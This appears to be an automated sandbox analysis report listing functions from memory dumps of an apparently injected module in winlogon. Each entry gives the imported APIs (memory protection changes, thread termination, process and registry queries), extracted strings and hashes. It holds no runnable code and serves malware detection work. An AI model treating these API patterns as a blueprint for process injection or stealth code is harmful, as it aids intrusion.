API String ID: 3013587201-537541572
Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction ID: efdaad13b162fecd45176c1601fdd0d5fce348f0f9cb4d74c0640e0fd08a9e7f
Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction Fuzzy Hash: A241B032339A80D9FA16DB66E8187DDB392BF49BA1F09413B9D0E97785EE38C4458350

Function 000001E8589B104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001E8589B10B1
RegEnumValueW.ADVAPI32 ref: 000001E8589B1117
GetProcessHeap.KERNEL32 ref: 000001E8589B115A
HeapAlloc.KERNEL32 ref: 000001E8589B1168
GetProcessHeap.KERNEL32 ref: 000001E8589B1185
HeapFree.KERNEL32 ref: 000001E8589B1193

Strings

d, xrefs: 000001E8589B10D6

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction ID: b1163f3ad4a2c33dc659d8962ce8299cd05609ddf549d15265609a563b1be8b4
Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction Fuzzy Hash: E2416F73224BC4CAE760DF61E44439EB7A1F789B99F04812ADE8907758DF39C485CB00

Function 000001E8589BD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD087
FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0A6
FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0CE
FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0DF
FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0F0

Strings

Y%, xrefs: 000001E8589BD0A6
1%, xrefs: 000001E8589BD0CE

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Value
String ID: 1%$Y%
API String ID: 3702945584-1395475152
Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction ID: aa2ce87c2e5d08cf880b526a954400d7df811dd07e48bc34c2f6fbcce052a6f2
Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction Fuzzy Hash: 94113A317296C4CAFA68A735D9953FDF2416F847E1F285236AC2E076EADE2C84028600

Function 000001E8589B7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001E8589B7538
__scrt_acquire_startup_lock.LIBCMT ref: 000001E8589B758A
_RTC_Initialize.LIBCMT ref: 000001E8589B75B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001E8589B75DE
__scrt_release_startup_lock.LIBCMT ref: 000001E8589B7609

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 424e5fee986169b2588fd60a7070510afe7af99a9e5ea540af609b12983588fe
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: 1C818B396282C1EFFB50AB65D8813EDF790AF85B82F14463BAD0C47796DE38C8458700

Function 000001E8589B9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000001E8589B9E49
GetLastError.KERNEL32 ref: 000001E8589B9E57
LoadLibraryExW.KERNEL32 ref: 000001E8589B9E81
FreeLibrary.KERNEL32 ref: 000001E8589B9EC7
GetProcAddress.KERNEL32 ref: 000001E8589B9ED3

Strings

api-ms-, xrefs: 000001E8589B9E69

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction ID: 0874071610b75d78b137934d7bb3787c1ea270a088fa8bad8bb2fa6638c7f79b
Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction Fuzzy Hash: 4231A23133AAC1E9EE12DB52E4407DDB394BF48BA1F5905369D1E0B791EF39C4658310

Function 000001E8589C3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001E8589C3DE5
GetLastError.KERNEL32 ref: 000001E8589C3DF1
CloseHandle.KERNEL32 ref: 000001E8589C3E09
CreateFileW.KERNEL32 ref: 000001E8589C3E34
WriteConsoleW.KERNEL32 ref: 000001E8589C3E53

Strings

CONOUT$, xrefs: 000001E8589C3E15

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction ID: e4881fcce3081a0d908705cf576626470a6a90982aea8447793606719cd19703
Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction Fuzzy Hash: 27115B32320AC0C6E7519B52E84439DFBA0FB88FE5F04422AEE5E87795CF39C8148744

Function 000001E8589B2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589B2F27
HeapAlloc.KERNEL32 ref: 000001E8589B2F3A
StrCmpNIW.SHLWAPI ref: 000001E8589B2FAF
GetProcessHeap.KERNEL32 ref: 000001E8589B3015
HeapFree.KERNEL32 ref: 000001E8589B3023

Strings

dialer, xrefs: 000001E8589B2FA8

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction ID: 22a39d6ef88b58d550097a84837a798e4384e01285b2469e00f0ad5875fd8a3e
Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction Fuzzy Hash: FD319F32725B95CAEA15DF96E5407ADFBA0FF44B82F0840369E4D47B59EF39C4A18700

Function 000001E8589BCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001E8589BCFAF
FlsSetValue.KERNEL32(?,?,?,000001E8589BD6B5,?,?,?,?,000001E8589BD778), ref: 000001E8589BCFE5
FlsSetValue.KERNEL32(?,?,?,000001E8589BD6B5,?,?,?,?,000001E8589BD778), ref: 000001E8589BD012
FlsSetValue.KERNEL32(?,?,?,000001E8589BD6B5,?,?,?,?,000001E8589BD778), ref: 000001E8589BD023
FlsSetValue.KERNEL32(?,?,?,000001E8589BD6B5,?,?,?,?,000001E8589BD778), ref: 000001E8589BD034
SetLastError.KERNEL32 ref: 000001E8589BD04F

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction ID: 1e0e9e661ea968faf47e5f9be1ba74f7c3a50c914e5506e2edc612bc17e3d70d
Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction Fuzzy Hash: B9115C312292C4CAFA64A771D5953FDF2526F897F6F14473AAC3F476DADE6884018600

Function 000001E8589B199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001E8589B19C2
K32GetModuleFileNameExW.KERNEL32 ref: 000001E8589B19E0
PathFindFileNameW.SHLWAPI ref: 000001E8589B19EF
lstrlenW.KERNEL32 ref: 000001E8589B19FB
StrCpyW.SHLWAPI ref: 000001E8589B1A0E
CloseHandle.KERNEL32 ref: 000001E8589B1A1C

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction ID: 8204dbe928e9efd943141ece04bc6ced883a62c760999c7dfaa781505eec1141
Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction Fuzzy Hash: FF010531324AC0C6EA54DB52E89879DB7A5BB88BC5F88403ADE4E43755DE3DC989C740

Function 000001E8589B36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001E8589B36E4
GetCurrentProcess.KERNEL32 ref: 000001E8589B36F2
VirtualProtectEx.KERNEL32 ref: 000001E8589B3714
GetCurrentProcess.KERNEL32 ref: 000001E8589B3732
VirtualProtectEx.KERNEL32 ref: 000001E8589B3753
TerminateThread.KERNEL32 ref: 000001E8589B3762

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction ID: e932fd6f93206b82514f0fe06f897a1b8c5f29290dfd6fa6980646282d759e98
Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction Fuzzy Hash: 1C011B753257C0CAEB259B62E84879DB7A0BF49B86F04043ACD4E17755EF3DC5088704

Function 000001E8589B8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001E8589B9013
_IsNonwritableInCurrentImage.LIBCMT ref: 000001E8589B90A8
RtlUnwindEx.NTDLL ref: 000001E8589B90F7

Strings

csm, xrefs: 000001E8589B908E
f, xrefs: 000001E8589B9026

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
Instruction ID: 5270aa4372cfd9b7b3a25713a09ade675b46112c9520692bc64e2f6ee0a834c5
Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
Instruction Fuzzy Hash: 4D519B32739682CEEB15CB15E848B9DB7A6FB45B89F108536DE0A47788EF75C841D700

Function 000001E8589B1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001E8589B1A60
StrCmpNIW.SHLWAPI ref: 000001E8589B1A7A
lstrlenW.KERNEL32 ref: 000001E8589B1A89
StrCpyW.SHLWAPI ref: 000001E8589B1A9E

Strings

\\?\, xrefs: 000001E8589B1A6E

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction ID: 95a1c83f90eb46ab096ca1721357a1fe3062f153325f5557bc07c7ce8fdb596f
Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction Fuzzy Hash: 3DF03C323246C5D2EB609B61F8D479DBB60FB88B89F844036DE4D46959DE2DC68DCB00

Function 000001E8589BBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001E8589BBCBD
GetProcAddress.KERNEL32 ref: 000001E8589BBCD3
FreeLibrary.KERNEL32 ref: 000001E8589BBCFA

Strings

mscoree.dll, xrefs: 000001E8589BBCB4
CorExitProcess, xrefs: 000001E8589BBCCC

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction ID: 001b9bb6c93794229350e6c80cd0198086eb55aa025ef2e010eccad3773778ae
Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction Fuzzy Hash: F3F06D71225AC4C2FB108B29E8443ADB720FF89BA1F54462BDE6E462E4CF2EC549C300

Function 000001E8589B3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000001E8589B3066
StrCpyW.SHLWAPI ref: 000001E8589B3076
StrCatW.SHLWAPI ref: 000001E8589B3082
PathCombineW.SHLWAPI ref: 000001E8589B3090

Strings

\\.\pipe\, xrefs: 000001E8589B305C

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction ID: 54657fac72875be1a94e19342f383fea5c2671d0b244a7b4eb32911dde1a2f06
Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction Fuzzy Hash: 43F05830228BC0C2EA008B52F9082ADBBA0AF48FC0F088136EE4E07B19DE2CC4498700

Function 000001E8589B5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001E8589B5726

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
Instruction ID: e979bb5767f17a5875adf326a5af591250b36e9f9924a585dba8a17403db4fee
Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
Instruction Fuzzy Hash: F461B476629B84CAE7609B55E48439EF7A0FB88795F500126EA8E47BA8DF7CC440CF04

Function 000001E858993504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001E85899352C
_set_statfp.LIBCMT ref: 000001E858993547
_set_statfp.LIBCMT ref: 000001E858993563
_set_statfp.LIBCMT ref: 000001E85899359F

Memory Dump Source

Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: 5ae2b81b01df07d095a8c6f67efdb50be62736a34741f5bf77a128705f7f4416
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 6411A336A30ED1D2FA641D28E4413EDB1836F5CB74F48A73AAD6F466E6DE24C8417102

Function 000001E8589C4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001E8589C412C
_set_statfp.LIBCMT ref: 000001E8589C4147
_set_statfp.LIBCMT ref: 000001E8589C4163
_set_statfp.LIBCMT ref: 000001E8589C419F

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: f42d5f5a704ddb6eb0c576794086d780c79e25a3ea788a9c9f775ae5c7c9e848
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: AC11A3B2B30BD092F6645569D4623EDBB407F783B8F0A0636BDBE076D6CE26C8414301

Function 000001E85898F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001E85898F124

Strings

or copy constructor iterator', xrefs: 000001E85898F25A, 000001E85898F275
Wednesday, xrefs: 000001E85898F1ED
Tuesday, xrefs: 000001E85898F0F4

Memory Dump Source

Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: Tuesday$Wednesday$or copy constructor iterator'
API String ID: 3215553584-4202648911
Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction ID: c085a7186edd0bd96b3b5f96f8b8f0c801fd9b3b4f1f589b90990ea3c2410778
Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction Fuzzy Hash: 9A61C2327206C2C6FA659B64E5403EEF6A1EF85794F54653BCE0E17BA6DF34C8468B00

Function 000001E8589BAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001E8589BAA68
_CallSETranslator.LIBVCRUNTIME ref: 000001E8589BAAB7

Strings

RCC, xrefs: 000001E8589BAA85
MOC, xrefs: 000001E8589BAA7C

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: d19808ae33988bda2650a5844b5d1748d42811ed884e7eddb2be384cf9521a74
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: 06614532629B84CAEB20DF65D4803DDB7A1FB48B89F044226EE8D17B98DF38D595C701

Function 000001E85898A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001E85898A1A0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001E85898A288

Strings

csm, xrefs: 000001E85898A2DA
csm, xrefs: 000001E85898A1C2

Memory Dump Source

Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 8b88985d8a19d565553951c9a4f98d0a05d5b30a49fe722d51b10b02fba8460f
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 185146332206C2CAEB748B25D54479CB7E0FB55B94F188227DE9D87A95CF39D491CB02

Function 000001E8589BAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001E8589BADA0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001E8589BAE88

Strings

csm, xrefs: 000001E8589BAEDA
csm, xrefs: 000001E8589BADC2

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 04f104a1198cfe77e9f18ad21fa7f3ffbc06d51044aeee31fab7197b13b47274
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 085149722292C0CEEB648B25D5843DDB7E0EB94B96F184127DE9D47AD5CF38D490CB02

Function 000001E858988405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001E858988413
_IsNonwritableInCurrentImage.LIBCMT ref: 000001E8589884A8

Strings

csm, xrefs: 000001E85898848E
f, xrefs: 000001E858988426

Memory Dump Source

Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: 969eefac54521e2ab512f8dcd0a7caf11298dcb48de377119434fb7e3a9081bd
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: 9751CE32721282CAEB14CB25E405BDDB799FB50B98F508176DE0E63788EF39CC418B24

Function 000001E8589883E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001E858988413
_IsNonwritableInCurrentImage.LIBCMT ref: 000001E8589884A8

Strings

csm, xrefs: 000001E85898848E
f, xrefs: 000001E858988426

Memory Dump Source

Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: 354f9a0964b41297c1ff2c31b1f1025270f73fa256f3a12dbaa3ee87bf0d0c62
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: DF31BC32221781D6E714DF21E845BDEB7A9FB40B88F458026EE9E53B88DF39C941CB14

Function 000001E8589C2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001E8589C20D7
WriteFile.KERNEL32 ref: 000001E8589C239F
WriteFile.KERNEL32 ref: 000001E8589C23E5
GetLastError.KERNEL32 ref: 000001E8589C249B

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction ID: 4a834175d774d777cb47a958f8acb45f37ceab2a92498808f5a7062e48617104
Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction Fuzzy Hash: F5D1BE32724A80CAE711CFA9D4403ECBBB1FB54B98F144226DE5E97B99DE35C506C740

Function 000001E8589B14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589B14C5
HeapFree.KERNEL32 ref: 000001E8589B14D4
GetProcessHeap.KERNEL32 ref: 000001E8589B14E1
HeapFree.KERNEL32 ref: 000001E8589B14F0
GetProcessHeap.KERNEL32 ref: 000001E8589B1500

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
Instruction ID: d0a60abff6c19dd014d05dd9f9736618db482ff87e777856ee8a457250a06e81
Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
